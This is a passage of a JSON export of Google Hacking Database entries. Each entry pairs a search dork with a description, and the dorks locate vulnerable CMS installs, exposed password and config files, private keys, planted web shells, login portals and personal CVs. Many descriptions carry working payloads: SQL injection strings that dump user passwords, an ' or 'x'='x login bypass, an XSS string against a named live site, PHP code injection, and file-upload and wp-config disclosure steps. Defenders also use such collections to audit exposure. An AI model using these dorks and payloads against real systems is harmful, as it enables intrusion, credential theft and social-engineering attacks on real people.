config/databases.yml in url, you\ncan find login / password for the databases\nAuthor: Simon Leblanc" }, { "signatureReferenceNumber": "3671", "link": "https://www.exploit-db.com/ghdb/3671/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22TinyBB%202011%20all%20rights%20reserved%22", "shortDescription": "\"TinyBB 2011 all rights reserved\"", "textualDescription": "Submitter: Aodrulez SQL Injection: http://www.exploit-db.com/exploits/15961/" }, { "signatureReferenceNumber": "3672", "link": "https://www.exploit-db.com/ghdb/3672/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:\"/modules.php?name=\" \"Maximus CMS\"", "shortDescription": "inurl:\"/modules.php?name=\" \"Maximus CMS\"", "textualDescription": "Maximus CMS (FCKeditor) File Upload Vulnerability\nhttp://www.exploit-db.com/exploits/15960\nAuthor: eidelweiss" }, { "signatureReferenceNumber": "3676", "link": "https://www.exploit-db.com/ghdb/3676/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=inurl:\"index.php?m=content+c=rss+catid=10\"", "shortDescription": "inurl:\"index.php?m=content+c=rss+catid=10\"", "textualDescription": "Author: eidelweiss http://host/index.php?m=content&c=rss&catid=5\tshow MySQL Error (table)" }, { "signatureReferenceNumber": "3677", "link": "https://www.exploit-db.com/ghdb/3677/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=\"inurl:cultbooking.php\"", "shortDescription": "\"inurl:cultbooking.php\"", "textualDescription": "CultBooking Multiple Vulnerabilities: http://www.exploit-db.com/exploits/16028/" }, { "signatureReferenceNumber": "3675", "link": "https://www.exploit-db.com/ghdb/3675/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext:\"Powered by DZOIC Handshakes Professional\"", "shortDescription": "intext:\"Powered by DZOIC Handshakes Professional\"", "textualDescription": "Author: IR-Security -Team\nSQL injection: http://server/administrator/index.php?section=manage_members&action=edit_photo&pho_id=-100001 union\nall select 1,version()--" }, { "signatureReferenceNumber": "3678", "link": "https://www.exploit-db.com/ghdb/3678/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl%3A%22%2Fplugins%2FImageManager%2Fmanager.php%22", "shortDescription": "inurl:\"/plugins/ImageManager/manager.php\"", "textualDescription": "Author: PenetraDz Shell Upload Vuln: manager/media/editor/plugins/ImageManager/manager.php" }, { "signatureReferenceNumber": "3679", "link": "https://www.exploit-db.com/ghdb/3679/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered%20by:%20PHP%20Link%20Directory%22", "shortDescription": "\"Powered by: PHP Link Directory\"", "textualDescription": "CSRF Vuln: http://www.exploit-db.com/exploits/16037/" }, { "signatureReferenceNumber": "3680", "link": "https://www.exploit-db.com/ghdb/3680/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:\"ab_fct.php?fct=\"", "shortDescription": "inurl:\"ab_fct.php?fct=\"", "textualDescription": "Multiple Vulnerabilities: http://www.exploit-db.com/exploits/16044" }, { "signatureReferenceNumber": "3681", "link": "https://www.exploit-db.com/ghdb/3681/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/#hl=en&sugexp=ldymls&xhr=t&q=Photo+Gallery+powered+by+TinyWebGallery+1.8.3&cp=45&pf=p&sclient=psy&site=&source=hp&aq=f&aqi=&aql=&oq=Photo+Gallery+powered+by+TinyWebGallery+1.8.3&pbx=1&fp=d9008d84f286047", "shortDescription": "Photo Gallery powered by TinyWebGallery 1.8.3", "textualDescription": "Multiple Vulnerabilities: Non-persistent XSS + Directory Traversal: http://www.exploit-db.com/exploits/16090" }, { "signatureReferenceNumber": "3682", "link": "https://www.exploit-db.com/ghdb/3682/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/#sclient=psy&hl=en&safe=off&site=&source=hp&q=:inurl%3Amj_wwwusr&aq=f&aqi=&aql=&oq=&pbx=1&fp=2dcb6979649afcb0", "shortDescription": ":inurl:mj_wwwusr", "textualDescription": "http://www.exploit-db.com/exploits/16103" }, { "signatureReferenceNumber": "3683", "link": "https://www.exploit-db.com/ghdb/3683/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allintext:%20/qcodo/_devtools/codegen.php", "shortDescription": "allintext: /qcodo/_devtools/codegen.php", "textualDescription": "Information Disclosure: http://www.exploit-db.com/exploits/16116" }, { "signatureReferenceNumber": "3684", "link": "https://www.exploit-db.com/ghdb/3684/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered%20By%20Dew-NewPHPLinks%20v.2.1b%22", "shortDescription": "\"Powered By Dew-NewPHPLinks v.2.1b\"", "textualDescription": "SQL Injection: http://www.exploit-db.com/exploits/16122" }, { "signatureReferenceNumber": "3685", "link": "https://www.exploit-db.com/ghdb/3685/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/#sclient=psy&hl=en&q=site:ebay.com+inurl%3Acallback&aq=f&aqi=&aql=&oq=&pbx=1&fp=9221d319c6f86414", "shortDescription": "site:ebay.com inurl:callback", "textualDescription": "Returns:\nhttp://sea.ebay.com/jplocal/campany/getcampnum.php?callback=?\n\nthen:\nhttp://sea.ebay.com/jplocal/campany/getcampnum.php?callback=?xxxx%3Cimg%20src=1%20onerror=alert(1)%3E\n\nCan also use: http://seclists.org/fulldisclosure/2011/Feb/199 XSS through UTF7-BOM string injection to bypass IE8 XSS Filters" }, { "signatureReferenceNumber": "3686", "link": "https://www.exploit-db.com/ghdb/3686/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:app/etc/local.xml", "shortDescription": "inurl:app/etc/local.xml", "textualDescription": "Magento local.xml sensitive information disclosure\nAuthor: Rambaud Pierre" }, { "signatureReferenceNumber": "3687", "link": "https://www.exploit-db.com/ghdb/3687/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22made+visual+by+sightFACTORY%22", "shortDescription": "\"made visual by sightFACTORY\"", "textualDescription": "Author : eXeSoul [#] http://server/accommodations.php?contentid=[sqli] [#] http://server/chamber_business.php?mid=[sqli] [#] http://server/work.php?mid=[sqli] [#] http://server/members.php?id=[SQLi]" }, { "signatureReferenceNumber": "3688", "link": "https://www.exploit-db.com/ghdb/3688/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered%20by%20zipbox%20media%22", "shortDescription": "\"powered by zipbox media\"", "textualDescription": "Author:XaDaL http://site.com/album.php?id=[SQLi]" }, { "signatureReferenceNumber": "3689", "link": "https://www.exploit-db.com/ghdb/3689/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=intext:db_pass inurl:settings.ini", "shortDescription": "intext:db_pass inurl:settings.ini", "textualDescription": "Submitter: Bastich mysql.nimbit.com dashboard settings" }, { "signatureReferenceNumber": "3690", "link": "https://www.exploit-db.com/ghdb/3690/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=intitle:cyber anarchy shell", "shortDescription": "intitle:cyber anarchy shell", "textualDescription": "Submitter: eXeSoul cyber anarchy shell" }, { "signatureReferenceNumber": "3691", "link": "https://www.exploit-db.com/ghdb/3691/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=MySQL: ON MSSQL: OFF Oracle: OFF MSSQL: OFF PostgreSQL: OFF cURL: ON WGet: ON Fetch: OFF Perl: ON", "shortDescription": "MySQL: ON MSSQL: OFF Oracle: OFF MSSQL: OFF PostgreSQL: OFF cURL: ON WGet: ON Fetch: OFF Perl: ON", "textualDescription": "Author :- eXeSoul\n\nYou will get lots of web shells even some private shells." }, { "signatureReferenceNumber": "3692", "link": "https://www.exploit-db.com/ghdb/3692/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=\"POWERED BY ZIPBOX MEDIA\" inurl:\"album.php\"", "shortDescription": "\"POWERED BY ZIPBOX MEDIA\" inurl:\"album.php\"", "textualDescription": "Author : AtT4CKxT3rR0r1ST \nSQL Injection: www.site.com/album.php?id=null[Sql]" }, { "signatureReferenceNumber": "3693", "link": "https://www.exploit-db.com/ghdb/3693/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=\"Powered by SOFTMAN\"", "shortDescription": "\"Powered by SOFTMAN\"", "textualDescription": "Author: eXeSoul\n\n[i] \"Powered by SOFTMAN\" \n[ii] \"Powered by Softman Multitech Pvt Ltd\"\n[iii] \"All Rights reserved by SOFTMAN\"\n\nGo To Admin Panel :-\nAdmin: ' or 'x'='x Password: ' or 'x'='x" }, { "signatureReferenceNumber": "3694", "link": "https://www.exploit-db.com/ghdb/3694/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Web+Design+by+Webz%22+filetype:asp", "shortDescription": "intext:\"Web Design by Webz\" filetype:asp", "textualDescription": "Submitter: p0pc0rn \nhttp://site.com/xxx.asp?id=[SQL] \nhttp://site.com/xxx.asp?catID=[SQL] \nhttp://site.com/xxx.asp?brandID=[SQL]" }, { "signatureReferenceNumber": "3695", "link": "https://www.exploit-db.com/ghdb/3695/", "category": "Advisories and Vulnerabilities", "querystring": "http://www/google.com/search?q=intext:\"Powered by EZPub\"", "shortDescription": "intext:\"Powered by EZPub\"", "textualDescription": "SQL Injection: http://www.exploit-db.com/exploits/16941" }, { "signatureReferenceNumber": "3696", "link": "https://www.exploit-db.com/ghdb/3696/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:\"sitegenius/topic.php\"", "shortDescription": "inurl:\"sitegenius/topic.php\"", "textualDescription": "Submitter: dR.sqL SQL Injection: http://localhost/sitegenius/topic.php?id=[SQLi]" }, { "signatureReferenceNumber": "3697", "link": "https://www.exploit-db.com/ghdb/3697/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=\"POWERED BY LOG1 CMS\"", "shortDescription": "\"POWERED BY LOG1 CMS\"", "textualDescription": "Multiple Vulnerabilities: http://www.exploit-db.com/exploits/16969/" }, { "signatureReferenceNumber": "3698", "link": "https://www.exploit-db.com/ghdb/3698/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=\"POWERED BY ADAN\"", "shortDescription": "ADAN (view.php ) Sql Injection Vulnerability", "textualDescription": "SQL Injection: http://www.exploit-db.com/exploits/16276/" }, { "signatureReferenceNumber": "3699", "link": "https://www.exploit-db.com/ghdb/3699/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:\"cascade server\" inurl:login.act", "shortDescription": "intitle:\"cascade server\" inurl:login.act", "textualDescription": "Search for login screen of default instance: Cascade Server CMS by Hannon Author: Erik Horton" }, { "signatureReferenceNumber": "3700", "link": "https://www.exploit-db.com/ghdb/3700/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext%3A%22Site+by+Triware+Technologies+Inc%22", "shortDescription": "intext:\"Site by Triware Technologies Inc\"", "textualDescription": "Submitter: p0pc0rn \nSQL Injection: http://site.com/default.asp?com=[Page]&id=[SQL]&m=[id] http://site.com/default.asp?com=[Page]&id=[id]&m=[SQL]" }, { "signatureReferenceNumber": "3701", "link": "https://www.exploit-db.com/ghdb/3701/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext%3A%22Powered+by+VoiceCMS%22", "shortDescription": "intext:\"Powered by VoiceCMS\"", "textualDescription": "Submitter: p0pc0rn SQL Injection: http://site.com/default.asp?com=[Page]&id=[SQL]&m=[id] http://site.com/default.asp?com=[Page]&id=[id]&m=[SQL]" }, { "signatureReferenceNumber": "3702", "link": "https://www.exploit-db.com/ghdb/3702/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext:%22Powered%20by%20OnePlug%20CMS%22", "shortDescription": "intext:\"Powered by OnePlug CMS\"", "textualDescription": "Sumitter: p0pc0rn \nSQL Injection: http://site.com/category_list.asp?Category_ID=1 union select 0 from test.a" }, { "signatureReferenceNumber": "3703", "link": "https://www.exploit-db.com/ghdb/3703/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=intitle:\"[EasyPHP] - Administration\"", "shortDescription": "intitle:\"[EasyPHP] - Administration\"", "textualDescription": "Unprotected EasyPHP Admin page detection.. Author: Aneesh Dogra (lionaneesh)" }, { "signatureReferenceNumber": "3704", "link": "https://www.exploit-db.com/ghdb/3704/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext%3A%22Powered+by+Inventory+Mojo+Software.%22", "shortDescription": "intext:\"Powered by Inventory Mojo Software.\"", "textualDescription": "Submitter: p0pc0rn\nSQL Injection (categoria.asp, producto.asp, srubro.asp, marca.asp, buscar.asp, Login.asp, NewUser.asp, do_addToNewsletter.asp) \n---\nhttp://site.com/categoria.asp?CT=6' and '1'='1 TRUE http://site.com/categoria.asp?CT=6' and '1'='0 FALSE" }, { "signatureReferenceNumber": "3705", "link": "https://www.exploit-db.com/ghdb/3705/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22site+by+Designscope%22", "shortDescription": "\"site by Designscope\"", "textualDescription": "Submitter: Net.Edit0r \nSQL Injection: http://127.0.0.1/general.php?pageID=[SQL] http://127.0.0.1/content.php?pageID=[SQL]" }, { "signatureReferenceNumber": "3706", "link": "https://www.exploit-db.com/ghdb/3706/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl%3Acom_ignitegallery", "shortDescription": "index.php?option=com_ignitegallery", "textualDescription": "Submitter: TiGeR_YeMeN HaCkEr \nSQL Injection: index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10+from+jos_users--" }, { "signatureReferenceNumber": "3707", "link": "https://www.exploit-db.com/ghdb/3707/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.ca/search?q=intext%3A%22Powered+by+FXRecruiter%22", "shortDescription": "intext:\"Powered by FXRecruiter\"", "textualDescription": "Submitter: Ashiyane Digital Security Team\nArbitrary File Upload: You must Register at site, Then in \"Upload CV Field\" Select and Upload Your File, then Using \"Live Http Header\" Change ur File Format To Etc Uploaded path: http://127.0.0.1/fxmodules/resumes/[Your File]" }, { "signatureReferenceNumber": "3708", "link": "https://www.exploit-db.com/ghdb/3708/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl%3A%22fbconnect_action%3Dmyhome%22", "shortDescription": "inurl:\"fbconnect_action=myhome\"", "textualDescription": "Submitter: z0mbyak \nSQL Injection: www.site.name/path/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--" }, { "signatureReferenceNumber": "3709", "link": "https://www.exploit-db.com/ghdb/3709/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=filetype:ini \"pdo_mysql\" (pass|passwd|password|pwd)", "shortDescription": "filetype:ini \"pdo_mysql\" (pass|passwd|password|pwd)", "textualDescription": "full details dbname dbuser dbpass all plain text\nAuthor:Bastich" }, { "signatureReferenceNumber": "3710", "link": "https://www.exploit-db.com/ghdb/3710/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=filetype:ini \"SavedPasswords\" (pass|passwd|password|pwd)", "shortDescription": "filetype:ini \"SavedPasswords\" (pass|passwd|password|pwd)", "textualDescription": "Unreal Tournament config, plain text passwords Author: Bastich" }, { "signatureReferenceNumber": "3711", "link": "https://www.exploit-db.com/ghdb/3711/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=filetype:ini \"precurio\" (pass|passwd|password|pwd)", "shortDescription": "filetype:ini \"precurio\" (pass|passwd|password|pwd)", "textualDescription": "plain text passwods" }, { "signatureReferenceNumber": "3712", "link": "https://www.exploit-db.com/ghdb/3712/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=filetype:ini \"FtpInBackground\" (pass|passwd|password|pwd)", "shortDescription": "filetype:ini \"FtpInBackground\" (pass|passwd|password|pwd)", "textualDescription": "Total commander wxc_ftp.ini run has through John etc. or even better use\nhttp://wcxftp.org.ru/" }, { "signatureReferenceNumber": "3713", "link": "https://www.exploit-db.com/ghdb/3713/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=filetype:ini \"[FFFTP]\" (pass|passwd|password|pwd)", "shortDescription": "filetype:ini \"[FFFTP]\" (pass|passwd|password|pwd)", "textualDescription": "Asian FTP software -, run the password hash through John etc. Author: Bastich" }, { "signatureReferenceNumber": "3714", "link": "https://www.exploit-db.com/ghdb/3714/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=\"error_log\" inurl:/wp-content", "shortDescription": "\"error_log\" inurl:/wp-content", "textualDescription": "Find various www readable Wordpress directories containing error logs with \nserver side debugging info, such as home path directory names, which are \noften the same user names for logging into the server over FTP and SSH.\n\nThis often exposes the path of the plug-ins installed in wordpress as well, \ngiving someone more information and avenues of attack since many Wordpress \nplug-ins can lead to compromises of the sites security. - DigiP" }, { "signatureReferenceNumber": "3715", "link": "https://www.exploit-db.com/ghdb/3715/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=allinurl:http://www.google.co.in/latitude/apps/badge/api?user=", "shortDescription": "allinurl:http://www.google.co.in/latitude/apps/badge/api?user=", "textualDescription": "Site: google.com/latitude - This is a free application where you can track\nyour PC, laptop and mobile, just login there and you will be tracked\nfreely(used to track yourself live and you can put this in blogs to show\nwhere you are)\n\nI made a dork simply that shows some couple of people, after some years when\nthis application will grow stronger and you can get tons of victims.\n\n*allinurl:http://www.google.co.in/latitude/apps/badge/api?user=*\n\n\n\nBy *The ALLSTAR*" }, { "signatureReferenceNumber": "3716", "link": "https://www.exploit-db.com/ghdb/3716/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=intitle:Locus7shell intext:\"Software:\"", "shortDescription": "intitle:Locus7shell intext:\"Software:\"", "textualDescription": "intitle:Locus7shell intext:\"Software:\"\n\nSubmitted by lionaneesh\n\n-- \nThanks\nAneesh Dogra (lionaneesh)" }, { "signatureReferenceNumber": "3717", "link": "https://www.exploit-db.com/ghdb/3717/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=filetype:xls + password + inurl:.com", "shortDescription": "filetype:xls + password + inurl:.com", "textualDescription": "The filetype:xls never changes\nWhat is inbtween then + sings can be what ever you are looking for\ntaxid\nssn\npassword\nStudent ID\netc\n\nThe inurl: can be changed to what you want\n.gov\n.edu\n.com\netc.\n\nTake care,\nRedShift" }, { "signatureReferenceNumber": "3718", "link": "https://www.exploit-db.com/ghdb/3718/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=\"Login Name\" Repository Webtop intitle:login", "shortDescription": "\"Login Name\" Repository Webtop intitle:login", "textualDescription": "Search for login screen of default instance: Documentum Webtop by EMC" }, { "signatureReferenceNumber": "3719", "link": "https://www.exploit-db.com/ghdb/3719/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:\"Enabling Self-Service Procurement\"", "shortDescription": "intitle:\"Enabling Self-Service Procurement\"", "textualDescription": "Search for login screen of default instance: Puridiom (A Procurement Web\nApplication)" }, { "signatureReferenceNumber": "3720", "link": "https://www.exploit-db.com/ghdb/3720/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:\"cyber recruiter\" \"User ID\"", "shortDescription": "intitle:\"cyber recruiter\" \"User ID\"", "textualDescription": "Search for login screen of default instance: Cyber Recruiter (applicant\ntracking and recruiting software)" }, { "signatureReferenceNumber": "3721", "link": "https://www.exploit-db.com/ghdb/3721/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:sarg inurl:siteuser.html", "shortDescription": "inurl:sarg inurl:siteuser.html", "textualDescription": "Submitter: pipefish \nSquid User Access Reports that show users' browsing history through\nthe proxy. Shows internal IP space sometimes, usernames as well, and can\nbe helpful when planning a pen test (spear phishing\\social engineering\ncampaign etc.) It also helps to ID an organization's proxy server." }, { "signatureReferenceNumber": "3722", "link": "https://www.exploit-db.com/ghdb/3722/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?q=inurl:/install/install.php intitle:vBulletin * Install System", "shortDescription": "vBulletin Install Page Detection", "textualDescription": "inurl:/install/install.php intitle:vBulletin * Install System\n\nThis dork displays the untreated install.php pages!\nAuth0r: lionaneesh\nGreetz to :Team Indishell , INDIA , Aasim Shaikh ," }, { "signatureReferenceNumber": "3723", "link": "https://www.exploit-db.com/ghdb/3723/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?q=inurl:loader-wizard ext:php", "shortDescription": "ionCube Loader Wizard information disclosure", "textualDescription": "inurl:loader-wizard ext:php\n\nThis dork displays sensitive information\nAuth0r: MaXe" }, { "signatureReferenceNumber": "3724", "link": "https://www.exploit-db.com/ghdb/3724/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.ca/search?q=inurl:\"clsUploadtest.asp\"", "shortDescription": "inurl:\"clsUploadtest.asp\"", "textualDescription": "Submitter: KDGCrew\nhttp://www.site.com/clsUpload/clsUploadtest.asp\nhttp://www.site.com/clsUpload/nameshell.php" }, { "signatureReferenceNumber": "3725", "link": "https://www.exploit-db.com/ghdb/3725/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=filetype:sql \"PostgreSQL database dump\" (pass|password|passwd|pwd)", "shortDescription": "filetype:sql \"PostgreSQL database dump\" (pass|password|passwd|pwd)", "textualDescription": "PostgreSQL database dump with passwords\n\nBastich" }, { "signatureReferenceNumber": "3726", "link": "https://www.exploit-db.com/ghdb/3726/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=filetype:sql \"MySQL dump\" (pass|password|passwd|pwd)", "shortDescription": "filetype:sql \"MySQL dump\" (pass|password|passwd|pwd)", "textualDescription": "MySQL database dump with passwords\n\nBastich" }, { "signatureReferenceNumber": "3727", "link": "https://www.exploit-db.com/ghdb/3727/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=filetype:sql \"phpmyAdmin SQL Dump\" (pass|password|passwd|pwd)", "shortDescription": "filetype:sql \"phpmyAdmin SQL Dump\" (pass|password|passwd|pwd)", "textualDescription": "phpMyAdmin SQL dump with passwords\n\nBastich" }, { "signatureReferenceNumber": "3728", "link": "https://www.exploit-db.com/ghdb/3728/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=site:dl.dropbox.com filetype:pdf cv OR curriculum vitae OR resume", "shortDescription": "site:dl.dropbox.com filetype:pdf cv OR curriculum vitae OR resume", "textualDescription": "Searches Dropbox for publicly avaliable PDF's containing information used in\na CV/Resume/Curriculum Vitae which can therefore be used in a Social\nEngineering based vector attack.\n\nAuthor: Trevor Starick" }, { "signatureReferenceNumber": "3729", "link": "https://www.exploit-db.com/ghdb/3729/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=site:docs.google.com intitle:(cv Or resume OR curriculum vitae)", "shortDescription": "site:docs.google.com intitle:(cv Or resume OR curriculum vitae)", "textualDescription": "Searches GoogleDocs for publicly avaliable PDF's containing information used in\na CV/Resume/Curriculum Vitae which can therefore be used in a Social\nEngineering based vector attack.\n\n--\nTrevor Starick" }, { "signatureReferenceNumber": "3730", "link": "https://www.exploit-db.com/ghdb/3730/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=site:mediafire.com cv Or resume OR curriculum vitae filetype:pdf OR doc", "shortDescription": "site:mediafire.com cv Or resume OR curriculum vitae filetype:pdf OR doc", "textualDescription": "Searches Mediafire for publicly avaliable PDF's containing information used in\na CV/Resume/Curriculum Vitae which can therefore be used in a Social\nEngineering based vector attack\n\n-- \nTrevor Starick" }, { "signatureReferenceNumber": "3731", "link": "https://www.exploit-db.com/ghdb/3731/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=site:stashbox.org cv Or resume OR curriculum vitae filetype:pdf OR doc", "shortDescription": "site:stashbox.org cv Or resume OR curriculum vitae filetype:pdf OR doc", "textualDescription": "Searches StashBox for publicly avaliable PDF's or .doc files\ncontaining information used in\na CV/Resume/Curriculum Vitae which can therefore be used in a Social\nEngineering based vector attack\n\n--\nTrevor Starick" }, { "signatureReferenceNumber": "3732", "link": "https://www.exploit-db.com/ghdb/3732/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:/push/ .pem apns -\"push notifications\" \"bag attributes\"", "shortDescription": "inurl:/push/ .pem apns -\"push notifications\" \"bag attributes\"", "textualDescription": "iphone apple push notification system private keys, frequently unencrypted,\nfrequently with DeviceIDs in same dir" }, { "signatureReferenceNumber": "3733", "link": "https://www.exploit-db.com/ghdb/3733/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:server-info intitle:\"Server Information\" Apache Server Information", "shortDescription": "inurl:server-info intitle:\"Server Information\" Apache Server Information", "textualDescription": "Juicy information about the apache server installation in the website.\n\n-- \n*Regards,\nFady Mohammed Osman.*" }, { "signatureReferenceNumber": "3734", "link": "https://www.exploit-db.com/ghdb/3734/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:\":9000\" PacketVideo corporation", "shortDescription": "inurl:\":9000\" PacketVideo corporation", "textualDescription": "inurl:\":9000\" PacketVideo corporation\n\nAbout: This provides Twonky Server Media interface. You can find images, music, videos etc.\n\nSubmitter: Ishaan P" }, { "signatureReferenceNumber": "3735", "link": "https://www.exploit-db.com/ghdb/3735/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=intitle:m1n1 1.01", "shortDescription": "intitle:m1n1 1.01", "textualDescription": "find the b374k shell.... \nSubmitted by : biLLbud" }, { "signatureReferenceNumber": "3736", "link": "https://www.exploit-db.com/ghdb/3736/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=filetype:pem \"Microsoft\"", "shortDescription": "filetype:pem \"Microsoft\"", "textualDescription": "Microsoft private keys, frequently used for servers with UserID on the same\npage.\n\n--\n\nShamanoid" }, { "signatureReferenceNumber": "3737", "link": "https://www.exploit-db.com/ghdb/3737/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intitle:\"vtiger CRM 5 - Commercial Open Source CRM\"", "shortDescription": "intitle:\"vtiger CRM 5 - Commercial Open Source CRM\"", "textualDescription": "vtiger CRM version 5.x presence\n\n--\nLiquidWorm" }, { "signatureReferenceNumber": "3738", "link": "https://www.exploit-db.com/ghdb/3738/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?q=allinurl:forcedownload.php?file=", "shortDescription": "allinurl:forcedownload.php?file=", "textualDescription": "Didn't see this anywhere in the GHDB, but its been known for a while and \nwidely abused by others.\n\nGoogle Dork \"allinurl:forcedownload.php?file=\"\n\nSites that use the forcedownload.php script are vulnerable to url \nmanipulation, and will spit out any file on the local site, including the \nPHP files themselves with all server side code, not the rendered page, but \nthe source itself. This is most commonly used on wordpress sites to grab the \nwp-config.php file to gain access to the database, but is not limited to \nwordpress sites. I only list it as an example, so people understand the \nweight of flaw.\n\n- DigiP" }, { "signatureReferenceNumber": "3739", "link": "https://www.exploit-db.com/ghdb/3739/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=filetype:ini \"Bootstrap.php\" (pass|passwd|password|pwd)", "shortDescription": "filetype:ini \"Bootstrap.php\" (pass|passwd|password|pwd)", "textualDescription": "Zend application ini, with usernames, passwords and db info\n\nlove\nBastich" }, { "signatureReferenceNumber": "3740", "link": "https://www.exploit-db.com/ghdb/3740/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+SLAED+CMS%22", "shortDescription": "\"Powered by SLAED CMS\"", "textualDescription": "Exploit Title: Slaed CMS Code exec\n\nOn different versions of this software next vulnerabilities are availible:\n\n/index.php?name=Search&mod=&word={${phpinfo()}}&query=ok&to=view\n/index.php?name=Search&mod=&word=ok&query={${phpinfo()}}&to=view\n\nOR:\n\n/search.html?mod=&word={${phpinfo()}}&query=ok&to=view\n/search.html?mod=&word=ok&query={${phpinfo()}}&to=view" }, { "signatureReferenceNumber": "3741", "link": "https://www.exploit-db.com/ghdb/3741/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=+intext:\"AWSTATS DATA FILE\" filetype:txt", "shortDescription": "+intext:\"AWSTATS DATA FILE\" filetype:txt", "textualDescription": "Shows data downloads containing statistics on the site.Made by AwstatsThe best dork for that system.By: 67pc" }, { "signatureReferenceNumber": "3742", "link": "https://www.exploit-db.com/ghdb/3742/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=inurl:ftp \"password\" filetype:xls", "shortDescription": "inurl:ftp \"password\" filetype:xls", "textualDescription": "this string may be used to find many low hanging fruit on FTP sites recently indexed by google. Author: Uhaba" }, { "signatureReferenceNumber": "3743", "link": "https://www.exploit-db.com/ghdb/3743/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=inurl:view.php?board1_sn=", "shortDescription": "inurl:view.php?board1_sn=", "textualDescription": "locates a webapp vulnerable to SQL injection" }, { "signatureReferenceNumber": "3744", "link": "https://www.exploit-db.com/ghdb/3744/", "category": "Footholds", "querystring": "http://www.google.com/search?q=inurl:\"amfphp/browser/servicebrowser.swf\"", "shortDescription": "inurl:\"amfphp/browser/servicebrowser.swf\"", "textualDescription": "AMFPHP service browser, debug interface. Author: syddd" }, { "signatureReferenceNumber": "3745", "link": "https://www.exploit-db.com/ghdb/3745/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=intitle%3A%23k4raeL+-+sh3LL", "shortDescription": "intitle:#k4raeL - sh3LL", "textualDescription": "intitle:#k4raeL - sh3LL\n\nFinds K4rael Shell , though many of them are dead but we can get some and\neven cache data can get you information , making website vulnerable\nAuthor: cyb3r.pr3dat0r" }, { "signatureReferenceNumber": "3746", "link": "https://www.exploit-db.com/ghdb/3746/", "category": "Files containing 